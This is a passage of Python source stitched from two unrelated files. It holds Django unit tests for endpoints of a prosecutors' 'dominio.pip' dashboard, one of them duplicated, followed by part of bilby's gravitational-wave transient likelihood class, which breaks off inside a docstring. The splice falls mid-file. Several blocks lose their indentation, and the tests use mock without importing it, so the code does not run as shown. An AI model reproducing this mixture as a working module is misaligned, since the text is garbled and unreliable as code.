            dk=12345, pess_dk=0, digit=5
        )
        assert resp.status_code == 200
        assert resp.data == expected_output
class TestComparadorRadares(NoJWTTestCase, TestCase):
    """Tests for the pip-comparador-radares endpoint.

    NOTE(review): unlike the other classes here this one omits
    NoCacheTestCase — confirm whether that is intentional.
    """

    @mock.patch("dominio.pip.views.PIPComparadorRadaresDAO.execute")
    def test_correct_response(self, _execute):
        """Each DAO row tuple is mapped onto a named radar-metrics dict."""
        _execute.return_value = [
            (
                "3456",
                "2ª PJ",
                "2ª PROMOTORIA",
                1.0,
                0.0,
                None,
                0.7,
                None
            ),
            (
                "6789",
                "1ª PJ",
                "1ª PROMOTORIA",
                1.0,
                1.0,
                None,
                1.0,
                None
            )
        ]
        url = reverse("dominio:pip-comparador-radares", args=("12345",))
        resp = self.client.get(url)
        expected_data = [
            {
                "orgao_id": "3456",
                "orgao_codamp": "2ª PJ",
                "orgi_nm_orgao": "2ª PROMOTORIA",
                "perc_denuncias": 1.0,
                "perc_cautelares": 0.0,
                "perc_acordos": None,
                "perc_arquivamentos": 0.7,
                "perc_aberturas_vista": None
            },
            {
                "orgao_id": "6789",
                "orgao_codamp": "1ª PJ",
                "orgi_nm_orgao": "1ª PROMOTORIA",
                "perc_denuncias": 1.0,
                "perc_cautelares": 1.0,
                "perc_acordos": None,
                "perc_arquivamentos": 1.0,
                "perc_aberturas_vista": None
            }
        ]
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.data, expected_data)
from django.test import TestCase
from django.urls import reverse
from dominio.tests.testconf import NoJWTTestCase, NoCacheTestCase
class TestPIPIndicadoresSucesso(NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-indicadores-sucesso endpoint."""

    @mock.patch("dominio.pip.views.PIPIndicadoresDeSucessoDAO.execute")
    def test_correct_response(self, _execute):
        """DAO row tuples are serialized into a list of dicts by the view."""
        _execute.return_value = [
            ("12345", 0.344, "p_finalizacoes"),
            ("12345", 0.123, "p_resolutividade"),
            ("12345", 0.983, "p_eludcidacoes"),
        ]
        orgao_id = "12345"
        url = reverse("dominio:pip-indicadores-sucesso", args=(orgao_id,))
        resp = self.client.get(url)
        # Note the orgao_id string is serialized as an int in the response.
        expected = [
            {"orgao_id": 12345, "indice": 0.344, "tipo": "p_finalizacoes"},
            {"orgao_id": 12345, "indice": 0.123, "tipo": "p_resolutividade"},
            {"orgao_id": 12345, "indice": 0.983, "tipo": "p_eludcidacoes"},
        ]
        assert resp.status_code == 200
        assert resp.data == expected
class TestPIPRadarPerformance(NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-radar-performance endpoint."""

    @mock.patch("dominio.pip.views.PIPRadarPerformanceDAO.get")
    def test_correct_response(self, _get_data):
        """The view passes the DAO payload through unchanged."""
        _get_data.return_value = {"data": 1}
        url = reverse("dominio:pip-radar-performance", args=("12345",))
        resp = self.client.get(url)
        assert resp.status_code == 200
        assert resp.data == {"data": 1}
class TestPIPPrincipaisInvestigadosView(
        NoJWTTestCase, NoCacheTestCase, TestCase):
    """Tests for the pip-principais-investigados list/flag endpoint."""

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
    def test_correct_response_get(self, _get_data):
        """GET returns the DAO rows wrapped with a page count."""
        _get_data.return_value = [{"data": 1}]
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        resp = self.client.get(url)
        expected_response = {
            'investigados': [{"data": 1}], 'nr_paginas': 1
        }
        _get_data.assert_called_once_with(orgao_id="1234", cpf="123")
        assert resp.status_code == 200
        assert resp.data == expected_response

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO.get")
    def test_correct_response_get_search(self, _get_data):
        """search_string filters the DAO rows by investigated name."""
        _get_data.return_value = [
            {"nm_investigado": "nome1"},
            {"nm_investigado": "nome2"}
        ]
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"search_string": "nome2"}
        resp = self.client.get(url, data)
        expected_response = {
            'investigados': [{"nm_investigado": "nome2"}],
            'nr_paginas': 1
        }
        _get_data.assert_called_once_with(orgao_id="1234", cpf="123")
        assert resp.status_code == 200
        assert resp.data == expected_response

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
                "save_hbase_flags")
    def test_correct_response_save_flags(self, _save_flags):
        """POST with both fields persists the flag and echoes the result."""
        _save_flags.return_value = {"data": 1}
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"representante_dk": "123456", "action": "qualquer"}
        resp = self.client.post(url, data)
        _save_flags.assert_called_once_with(
            "1234", "123", "123456", "qualquer"
        )
        assert resp.status_code == 200
        assert resp.data == {"data": 1}

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
                "save_hbase_flags")
    def test_no_personagem_save_flags(self, _save_flags):
        """POST without representante_dk raises and must not persist."""
        _save_flags.return_value = {"data": 1}
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"action": "qualquer"}
        # BUG FIX: the original asserted resp.status_code after this block,
        # but when the expected ValueError fires resp is never bound, so
        # that assertion raised NameError instead of testing anything.
        with self.assertRaises(ValueError):
            self.client.post(url, data)
        _save_flags.assert_not_called()

    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosDAO."
                "save_hbase_flags")
    def test_no_action_save_flags(self, _save_flags):
        """POST without action raises and must not persist."""
        _save_flags.return_value = {"data": 1}
        url = reverse(
            "dominio:pip-principais-investigados",
            args=("1234", "123")
        )
        data = {"representante_dk": "123456"}
        # Same fix as above: no status assertion on an unbound response.
        with self.assertRaises(ValueError):
            self.client.post(url, data)
        _save_flags.assert_not_called()
class TestPIPPrincipaisInvestigadosListaView(
        NoJWTTestCase, NoCacheTestCase, TestCase):
    """Checks the lista endpoint aggregates perfil, similares and procedimentos."""
    @mock.patch("dominio.pip.views."
                "PIPPrincipaisInvestigadosPerfilDAO.get_header_info")
    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosPerfilDAO.get")
    @mock.patch("dominio.pip.views.PIPPrincipaisInvestigadosListaDAO.get")
    def test_correct_response(self, _get_procedimentos, _get_perfil, _header):
        header_payload = {"data": 1}
        perfil_payload = [{"data": 1}]
        procedimentos_payload = [{"data": 1}, {"data": 2}]
        _header.return_value = header_payload
        _get_perfil.return_value = perfil_payload
        _get_procedimentos.return_value = procedimentos_payload
        resp = self.client.get(
            reverse(
                "dominio:pip-principais-investigados-lista",
                args=("12345",)
            )
        )
        _get_perfil.assert_called_once_with(dk=12345, digit=5)
        _get_procedimentos.assert_called_once_with(
            dk=12345, pess_dk=0, digit=5
        )
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(
            resp.data,
            {
                "perfil": header_payload,
                "similares": perfil_payload,
                "procedimentos": procedimentos_payload,
            },
        )
class TestComparadorRadares(NoJWTTestCase, TestCase):
    @mock.patch("dominio.pip.views.PIPComparadorRadaresDAO.execute")
    def test_correct_response(self, _execute):
        """Raw DAO tuples are serialized into per-orgao radar dicts."""
        fields = (
            "orgao_id", "orgao_codamp", "orgi_nm_orgao", "perc_denuncias",
            "perc_cautelares", "perc_acordos", "perc_arquivamentos",
            "perc_aberturas_vista",
        )
        rows = [
            ("3456", "2ª PJ", "2ª PROMOTORIA", 1.0, 0.0, None, 0.7, None),
            ("6789", "1ª PJ", "1ª PROMOTORIA", 1.0, 1.0, None, 1.0, None),
        ]
        _execute.return_value = rows
        resp = self.client.get(
            reverse("dominio:pip-comparador-radares", args=("12345",))
        )
        expected_data = [dict(zip(fields, row)) for row in rows]
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.data, expected_data)
import os
import json
import copy
import math
import attr
import numpy as np
import pandas as pd
from scipy.special import logsumexp
from ..core.likelihood import Likelihood
from ..core.utils import BilbyJsonEncoder, decode_bilby_json
from ..core.utils import (
logger, UnsortedInterp2d, create_frequency_series, create_time_series,
speed_of_light, solar_mass, radius_of_earth, gravitational_constant,
round_up_to_power_of_two)
from ..core.prior import Interped, Prior, Uniform, PriorDict, DeltaFunction
from .detector import InterferometerList, get_empty_interferometer, calibration
from .prior import BBHPriorDict, CBCPriorDict, Cosmological
from .source import lal_binary_black_hole
from .utils import (
noise_weighted_inner_product, build_roq_weights, zenith_azimuth_to_ra_dec,
ln_i0
)
from .waveform_generator import WaveformGenerator
class GravitationalWaveTransient(Likelihood):
""" A gravitational-wave transient likelihood object
This is the usual likelihood object to use for transient gravitational
wave parameter estimation. It computes the log-likelihood in the frequency
domain assuming a colored Gaussian noise model described by a power
spectral density. See Thrane & Talbot (2019), arxiv.org/abs/1809.02293.
Parameters
==========
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal,
given some set of parameters
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood.
This uses a look up table calculated at run time.
The distance prior is set to be a delta function at the minimum
distance allowed in the prior being marginalised over.
time_marginalization: bool, optional
If true, marginalize over time in the likelihood.
This uses a FFT to calculate the likelihood over a regularly spaced
grid.
In order to cover the whole space the prior is set to be uniform over
the spacing of the array of times.
If using time marginalisation and jitter_time is True a "jitter"
parameter is added to the prior which modifies the position of the
grid of times.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood.
This is done analytically using a Bessel function.
The phase prior is set to be a delta function at phase=0.
calibration_marginalization: bool, optional
If true, marginalize over calibration response curves in the likelihood.
This is done numerically over a number of calibration response curve realizations.
priors: dict, optional
If given, used in the distance and phase marginalization.
        Warning: when using marginalisation the dict is overwritten which will
        change the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array,
(distance) prior_array, and reference_distance used to construct
the table.
If a string the name of a file containing these quantities.
The lookup table is stored after construction in either the
provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
calibration_lookup_table: dict, optional
If a dict, contains the arrays over which to marginalize for each interferometer or the filepaths of the
calibration files.
If not provided, but calibration_marginalization is used, then the appropriate file is created to
contain the curves.
number_of_response_curves: int, optional
Number of curves from the calibration lookup table to use.
Default is 1000.
starting_index: int, optional
Sets the index for the first realization of the calibration curve to be considered.
This, coupled with number_of_response_curves, allows for restricting the set of curves used. This can be used
when dealing with large frequency arrays to split the calculation into sections.
Defaults to 0.
jitter_time: bool, optional
Whether to introduce a `time_jitter` parameter. This avoids either
missing the likelihood peak, or introducing biases in the
reconstructed time posterior due to an insufficient sampling frequency.
Default is False, however using this parameter is strongly encouraged.
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- :code:`sky`: sample in RA/dec, this is the default
- e.g., :code:`"H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"])`:
          sample in azimuth and zenith, `azimuth` and `zenith` defined in the
          frame where the z-axis is aligned with the vector connecting H1
          and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- :code:`geocent`/:code:`geocenter`: sample in the time at the
Earth's center, this is the default
- e.g., :code:`H1`: sample in the time of arrival at H1
Returns
=======
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given
some model parameters
"""
    @attr.s
    class _CalculatedSNRs:
        """Per-detector SNR quantities returned by `calculate_snrs`."""
        # <d|h>: inner product of data with the template
        d_inner_h = attr.ib()
        # <h|h>: template inner product with itself
        optimal_snr_squared = attr.ib()
        # <d|h> / sqrt(<h|h>)
        complex_matched_filter_snr = attr.ib()
        # <d|h> per time sample and/or calibration draw (None unless marginalizing)
        d_inner_h_array = attr.ib()
        # <h|h> per calibration draw (None unless calibration-marginalizing)
        optimal_snr_squared_array = attr.ib()
        # unused here; kept for interface compatibility — always None in this class
        d_inner_h_squared_tc_array = attr.ib()
    def __init__(
        self, interferometers, waveform_generator, time_marginalization=False,
        distance_marginalization=False, phase_marginalization=False, calibration_marginalization=False, priors=None,
        distance_marginalization_lookup_table=None, calibration_lookup_table=None,
        number_of_response_curves=1000, starting_index=0, jitter_time=True, reference_frame="sky",
        time_reference="geocenter"
    ):
        """Set up the likelihood and any requested marginalizations.

        See the class docstring for parameter descriptions. Note that
        `priors` is mutated in place when marginalizations are enabled
        (marginalized parameters are replaced by fixed reference values).
        """
        self.waveform_generator = waveform_generator
        super(GravitationalWaveTransient, self).__init__(dict())
        self.interferometers = InterferometerList(interferometers)
        self.time_marginalization = time_marginalization
        self.distance_marginalization = distance_marginalization
        self.phase_marginalization = phase_marginalization
        self.calibration_marginalization = calibration_marginalization
        self.priors = priors
        self._check_set_duration_and_sampling_frequency_of_waveform_generator()
        self.jitter_time = jitter_time
        self.reference_frame = reference_frame
        # A non-geocenter time reference is incompatible with time
        # marginalization, which works on the geocentered time grid.
        if "geocent" not in time_reference:
            self.time_reference = time_reference
            self.reference_ifo = get_empty_interferometer(self.time_reference)
            if self.time_marginalization:
                logger.info("Cannot marginalise over non-geocenter time.")
                self.time_marginalization = False
                self.jitter_time = False
        else:
            self.time_reference = "geocent"
            self.reference_ifo = None
        if self.time_marginalization:
            self._check_marginalized_prior_is_set(key='geocent_time')
            self._setup_time_marginalization()
            # Pin the marginalized time to a fixed value in the prior dict.
            priors['geocent_time'] = float(self.interferometers.start_time)
            if self.jitter_time:
                # Jitter shifts the discrete time grid so the likelihood
                # peak is not missed between grid points.
                priors['time_jitter'] = Uniform(
                    minimum=- self._delta_tc / 2,
                    maximum=self._delta_tc / 2,
                    boundary='periodic',
                    name="time_jitter",
                    latex_label="$t_j$"
                )
            self._marginalized_parameters.append('geocent_time')
        elif self.jitter_time:
            # Jitter is meaningless without time marginalization.
            logger.debug(
                "Time jittering requested with non-time-marginalised "
                "likelihood, ignoring.")
            self.jitter_time = False
        if self.phase_marginalization:
            self._check_marginalized_prior_is_set(key='phase')
            priors['phase'] = float(0)
            self._marginalized_parameters.append('phase')
        if self.distance_marginalization:
            self._lookup_table_filename = None
            self._check_marginalized_prior_is_set(key='luminosity_distance')
            # Distance grid and its prior weights for the lookup table.
            self._distance_array = np.linspace(
                self.priors['luminosity_distance'].minimum,
                self.priors['luminosity_distance'].maximum, int(1e4))
            self.distance_prior_array = np.array(
                [self.priors['luminosity_distance'].prob(distance)
                 for distance in self._distance_array])
            # Reference distance = median of the distance prior.
            self._ref_dist = self.priors['luminosity_distance'].rescale(0.5)
            self._setup_distance_marginalization(
                distance_marginalization_lookup_table)
            # Distance-equivalent parameters must not be sampled as well.
            for key in ['redshift', 'comoving_distance']:
                if key in priors:
                    del priors[key]
            priors['luminosity_distance'] = float(self._ref_dist)
            self._marginalized_parameters.append('luminosity_distance')
        if self.calibration_marginalization:
            self.number_of_response_curves = number_of_response_curves
            self.starting_index = starting_index
            self._setup_calibration_marginalization(calibration_lookup_table)
            self._marginalized_parameters.append('recalib_index')
def __repr__(self):
return self.__class__.__name__ + '(interferometers={},\n\twaveform_generator={},\n\ttime_marginalization={}, ' \
'distance_marginalization={}, phase_marginalization={}, '\
'calibration_marginalization={}, priors={})'\
.format(self.interferometers, self.waveform_generator, self.time_marginalization,
self.distance_marginalization, self.phase_marginalization, self.calibration_marginalization,
self.priors)
    def _check_set_duration_and_sampling_frequency_of_waveform_generator(self):
        """ Check the waveform_generator has the same duration and
        sampling_frequency as the interferometers. If they are unset, then
        set them, if they differ, raise an error
        """
        attributes = ['duration', 'sampling_frequency', 'start_time']
        for attribute in attributes:
            wfg_attr = getattr(self.waveform_generator, attribute)
            ifo_attr = getattr(self.interferometers, attribute)
            if wfg_attr is None:
                logger.debug(
                    "The waveform_generator {} is None. Setting from the "
                    "provided interferometers.".format(attribute))
            elif wfg_attr != ifo_attr:
                logger.debug(
                    "The waveform_generator {} is not equal to that of the "
                    "provided interferometers. Overwriting the "
                    "waveform_generator.".format(attribute))
            # NOTE(review): the interferometer value is copied onto the
            # waveform generator unconditionally (not only in the two
            # logged branches); despite the docstring, no error is raised.
            setattr(self.waveform_generator, attribute, ifo_attr)
    def calculate_snrs(self, waveform_polarizations, interferometer):
        """
        Compute the snrs
        Parameters
        ==========
        waveform_polarizations: dict
            A dictionary of waveform polarizations and the corresponding array
        interferometer: bilby.gw.detector.Interferometer
            The bilby interferometer object

        Returns
        =======
        _CalculatedSNRs
            Scalar <d|h>, <h|h>, matched-filter SNR, plus per-time and/or
            per-calibration-draw arrays when the respective marginalizations
            are active (None otherwise).
        """
        signal = interferometer.get_detector_response(
            waveform_polarizations, self.parameters)
        _mask = interferometer.frequency_mask
        # If a specific calibration draw was selected (e.g. during posterior
        # reconstruction), apply that response curve to the signal.
        if 'recalib_index' in self.parameters:
            signal[_mask] *= self.calibration_draws[interferometer.name][int(self.parameters['recalib_index'])]
        d_inner_h = interferometer.inner_product(signal=signal)
        optimal_snr_squared = interferometer.optimal_snr_squared(signal=signal)
        complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
        d_inner_h_array = None
        optimal_snr_squared_array = None
        if self.time_marginalization and self.calibration_marginalization:
            # <d|h> per (calibration draw, time shift): tile the integrand
            # across draws, weight by each draw's response, then FFT over
            # frequency to get the time series of inner products.
            d_inner_h_integrand = np.tile(
                interferometer.frequency_domain_strain.conjugate() * signal /
                interferometer.power_spectral_density_array, (self.number_of_response_curves, 1)).T
            d_inner_h_integrand[_mask] *= self.calibration_draws[interferometer.name].T
            d_inner_h_array =\
                4 / self.waveform_generator.duration * np.fft.fft(
                    d_inner_h_integrand[0:-1], axis=0).T
            optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
                np.abs(signal)**2 / interferometer.power_spectral_density_array
            optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
                                               self.calibration_abs_draws[interferometer.name].T)
        elif self.time_marginalization and not self.calibration_marginalization:
            # <d|h> as a function of coalescence time via a single FFT.
            d_inner_h_array =\
                4 / self.waveform_generator.duration * np.fft.fft(
                    signal[0:-1] *
                    interferometer.frequency_domain_strain.conjugate()[0:-1] /
                    interferometer.power_spectral_density_array[0:-1])
        elif self.calibration_marginalization and ('recalib_index' not in self.parameters):
            # <d|h> and <h|h> per calibration draw (no time grid).
            d_inner_h_integrand = 4. / self.waveform_generator.duration * \
                interferometer.frequency_domain_strain.conjugate() * signal / \
                interferometer.power_spectral_density_array
            d_inner_h_array = np.dot(d_inner_h_integrand[_mask], self.calibration_draws[interferometer.name].T)
            optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
                np.abs(signal)**2 / interferometer.power_spectral_density_array
            optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
                                               self.calibration_abs_draws[interferometer.name].T)
        return self._CalculatedSNRs(
            d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
            complex_matched_filter_snr=complex_matched_filter_snr,
            d_inner_h_array=d_inner_h_array,
            optimal_snr_squared_array=optimal_snr_squared_array,
            d_inner_h_squared_tc_array=None)
    def _check_marginalized_prior_is_set(self, key):
        """Validate that a sensible prior exists for a marginalized parameter.

        Raises ValueError when the prior is fixed (nothing to marginalize
        over); installs a default prior when none is provided.
        """
        if key in self.priors and self.priors[key].is_fixed:
            raise ValueError(
                "Cannot use marginalized likelihood for {}: prior is fixed"
                .format(key))
        if key not in self.priors or not isinstance(
                self.priors[key], Prior):
            logger.warning(
                'Prior not provided for {}, using the BBH default.'.format(key))
            if key == 'geocent_time':
                # Default: uniform over the analyzed data segment.
                self.priors[key] = Uniform(
                    self.interferometers.start_time,
                    self.interferometers.start_time + self.interferometers.duration)
            elif key == 'luminosity_distance':
                # NOTE(review): the loop variable below shadows the outer
                # `key` argument; harmless here since nothing reads the
                # outer `key` afterwards in this branch, but fragile.
                for key in ['redshift', 'comoving_distance']:
                    if key in self.priors:
                        if not isinstance(self.priors[key], Cosmological):
                            raise TypeError(
                                "To marginalize over {}, the prior must be specified as a "
                                "subclass of bilby.gw.prior.Cosmological.".format(key)
                            )
                        # Convert the cosmological prior to its equivalent
                        # luminosity-distance prior and drop the original.
                        self.priors['luminosity_distance'] = self.priors[key].get_corresponding_prior(
                            'luminosity_distance'
                        )
                        del self.priors[key]
            else:
                self.priors[key] = BBHPriorDict()[key]
    @property
    def priors(self):
        """The prior dictionary used for marginalization (may be None)."""
        return self._prior

    @priors.setter
    def priors(self, priors):
        # A copy is stored so later internal mutation does not depend on the
        # caller's object identity (the caller's dict is still mutated by
        # __init__ where marginalized keys are replaced).
        if priors is not None:
            self._prior = priors.copy()
        elif any([self.time_marginalization, self.phase_marginalization,
                  self.distance_marginalization]):
            # Marginalization needs prior bounds, so None is not allowed.
            raise ValueError("You can't use a marginalized likelihood without specifying a priors")
        else:
            self._prior = None
def noise_log_likelihood(self):
log_l = 0
for interferometer in self.interferometers:
mask = interferometer.frequency_mask
log_l -= noise_weighted_inner_product(
interferometer.frequency_domain_strain[mask],
interferometer.frequency_domain_strain[mask],
interferometer.power_spectral_density_array[mask],
self.waveform_generator.duration) / 2
return float(np.real(log_l))
    def log_likelihood_ratio(self):
        """Log likelihood ratio of signal vs. noise for the current parameters.

        Accumulates <d|h> and <h|h> over detectors, then applies whichever
        analytic/numerical marginalizations are enabled. Returns -inf
        (nan-safe) when the waveform generator fails to produce a signal.
        """
        waveform_polarizations =\
            self.waveform_generator.frequency_domain_strain(self.parameters)
        self.parameters.update(self.get_sky_frame_parameters())
        if waveform_polarizations is None:
            return np.nan_to_num(-np.inf)
        d_inner_h = 0.
        optimal_snr_squared = 0.
        complex_matched_filter_snr = 0.
        # Pre-allocate accumulator arrays whose shape depends on which
        # marginalizations are active.
        if self.time_marginalization and self.calibration_marginalization:
            if self.jitter_time:
                # Temporarily shift the time grid by the jitter; undone below.
                self.parameters['geocent_time'] += self.parameters['time_jitter']
            d_inner_h_array = np.zeros(
                (self.number_of_response_curves, len(self.interferometers.frequency_array[0:-1])),
                dtype=np.complex128)
            optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        elif self.time_marginalization:
            if self.jitter_time:
                self.parameters['geocent_time'] += self.parameters['time_jitter']
            d_inner_h_array = np.zeros(
                len(self.interferometers.frequency_array[0:-1]),
                dtype=np.complex128)
        elif self.calibration_marginalization:
            d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
            optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        for interferometer in self.interferometers:
            per_detector_snr = self.calculate_snrs(
                waveform_polarizations=waveform_polarizations,
                interferometer=interferometer)
            d_inner_h += per_detector_snr.d_inner_h
            optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
            complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
            if self.time_marginalization or self.calibration_marginalization:
                d_inner_h_array += per_detector_snr.d_inner_h_array
            if self.calibration_marginalization:
                optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
        # Dispatch to the appropriate marginalized likelihood; the jitter
        # shift applied above is reverted in the time-marginalized branches.
        if self.calibration_marginalization and self.time_marginalization:
            log_l = self.time_and_calibration_marginalized_likelihood(
                d_inner_h_array=d_inner_h_array,
                h_inner_h=optimal_snr_squared_array)
            if self.jitter_time:
                self.parameters['geocent_time'] -= self.parameters['time_jitter']
        elif self.calibration_marginalization:
            log_l = self.calibration_marginalized_likelihood(
                d_inner_h_calibration_array=d_inner_h_array,
                h_inner_h=optimal_snr_squared_array)
        elif self.time_marginalization:
            log_l = self.time_marginalized_likelihood(
                d_inner_h_tc_array=d_inner_h_array,
                h_inner_h=optimal_snr_squared)
            if self.jitter_time:
                self.parameters['geocent_time'] -= self.parameters['time_jitter']
        elif self.distance_marginalization:
            log_l = self.distance_marginalized_likelihood(
                d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
        elif self.phase_marginalization:
            log_l = self.phase_marginalized_likelihood(
                d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
        else:
            # No marginalization: ln L = Re<d|h> - <h|h>/2
            log_l = np.real(d_inner_h) - optimal_snr_squared / 2
        return float(log_l.real)
    def generate_posterior_sample_from_marginalized_likelihood(self):
        """
        Reconstruct the distance posterior from a run which used a likelihood
        which explicitly marginalised over time/distance/phase.
        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
        Returns
        =======
        sample: dict
            Returns the parameters with new samples.
        Notes
        =====
        This involves a deepcopy of the signal to avoid issues with waveform
        caching, as the signal is overwritten in place.
        """
        if any([self.phase_marginalization, self.distance_marginalization,
                self.time_marginalization, self.calibration_marginalization]):
            signal_polarizations = copy.deepcopy(
                self.waveform_generator.frequency_domain_strain(
                    self.parameters))
        else:
            # Nothing was marginalized; the sample is already complete.
            return self.parameters
        if self.calibration_marginalization and self.time_marginalization:
            raise AttributeError(
                "Cannot use time and calibration marginalization simultaneously for regeneration at the moment!"
                "The matrix manipulation has not been tested.")
        # Order matters: later reconstructions condition on the values drawn
        # earlier (e.g. distance is drawn at the reconstructed time).
        if self.calibration_marginalization:
            new_calibration = self.generate_calibration_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['recalib_index'] = new_calibration
        if self.time_marginalization:
            new_time = self.generate_time_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['geocent_time'] = new_time
        if self.distance_marginalization:
            new_distance = self.generate_distance_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['luminosity_distance'] = new_distance
        if self.phase_marginalization:
            new_phase = self.generate_phase_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['phase'] = new_phase
        return self.parameters.copy()
    def generate_calibration_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for the set of calibration response curves when
        explicitly marginalizing over the calibration uncertainty.
        Parameters
        ----------
        signal_polarizations: dict, optional
            Polarizations modes of the template.
        Returns
        -------
        new_calibration: dict
            Sample set from the calibration posterior
        """
        # Remove any previously selected draw so the per-draw likelihoods
        # are computed over the full set of response curves.
        if 'recalib_index' in self.parameters:
            self.parameters.pop('recalib_index')
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        log_like = self.get_calibration_log_likelihoods(signal_polarizations=signal_polarizations)
        # Convert per-draw log likelihoods to a normalized discrete posterior
        # (max subtracted for numerical stability), then draw an index.
        calibration_post = np.exp(log_like - max(log_like))
        calibration_post /= np.sum(calibration_post)
        new_calibration = np.random.choice(self.number_of_response_curves, p=calibration_post)
        return new_calibration
    def generate_time_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for coalescence
        time when using a likelihood which explicitly marginalises over time.
        In order to resolve the posterior we artificially upsample to 16kHz.
        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template.
        Returns
        =======
        new_time: float
            Sample from the time posterior.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if self.jitter_time:
            self.parameters['geocent_time'] += self.parameters['time_jitter']
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        # Build a 16 kHz time grid wrapped onto the analyzed segment, then
        # keep only times inside the geocent_time prior support.
        times = create_time_series(
            sampling_frequency=16384,
            starting_time=self.parameters['geocent_time'] - self.waveform_generator.start_time,
            duration=self.waveform_generator.duration)
        times = times % self.waveform_generator.duration
        times += self.waveform_generator.start_time
        prior = self.priors["geocent_time"]
        in_prior = (times >= prior.minimum) & (times < prior.maximum)
        times = times[in_prior]
        # Zero-padded buffers at the upsampled length; padding the signal
        # and data in frequency corresponds to interpolating in time.
        n_time_steps = int(self.waveform_generator.duration * 16384)
        d_inner_h = np.zeros(len(times), dtype=complex)
        psd = np.ones(n_time_steps)
        signal_long = np.zeros(n_time_steps, dtype=complex)
        data = np.zeros(n_time_steps, dtype=complex)
        h_inner_h = np.zeros(1)
        for ifo in self.interferometers:
            ifo_length = len(ifo.frequency_domain_strain)
            mask = ifo.frequency_mask
            signal = ifo.get_detector_response(
                signal_polarizations, self.parameters)
            signal_long[:ifo_length] = signal
            data[:ifo_length] = np.conj(ifo.frequency_domain_strain)
            psd[:ifo_length][mask] = ifo.power_spectral_density_array[mask]
            # FFT gives <d|h> on the fine time grid in a single pass.
            d_inner_h += np.fft.fft(signal_long * data / psd)[in_prior]
            h_inner_h += ifo.optimal_snr_squared(signal=signal).real
        if self.distance_marginalization:
            time_log_like = self.distance_marginalized_likelihood(
                d_inner_h, h_inner_h)
        elif self.phase_marginalization:
            time_log_like = ln_i0(abs(d_inner_h)) - h_inner_h.real / 2
        else:
            time_log_like = (d_inner_h.real - h_inner_h.real / 2)
        time_prior_array = self.priors['geocent_time'].prob(times)
        time_post = (
            np.exp(time_log_like - max(time_log_like)) * time_prior_array)
        # Discard negligible-probability times; keep at least a few points
        # (plus neighbors) so the interpolant below is well defined.
        keep = (time_post > max(time_post) / 1000)
        if sum(keep) < 3:
            keep[1:-1] = keep[1:-1] | keep[2:] | keep[:-2]
        time_post = time_post[keep]
        times = times[keep]
        new_time = Interped(times, time_post).sample()
        return new_time
    def generate_distance_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for luminosity
        distance when using a likelihood which explicitly marginalises over
        distance.
        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template.
            Note: These are rescaled in place after the distance sample is
            generated to allow further parameter reconstruction to occur.
        Returns
        =======
        new_distance: float
            Sample from the distance posterior.
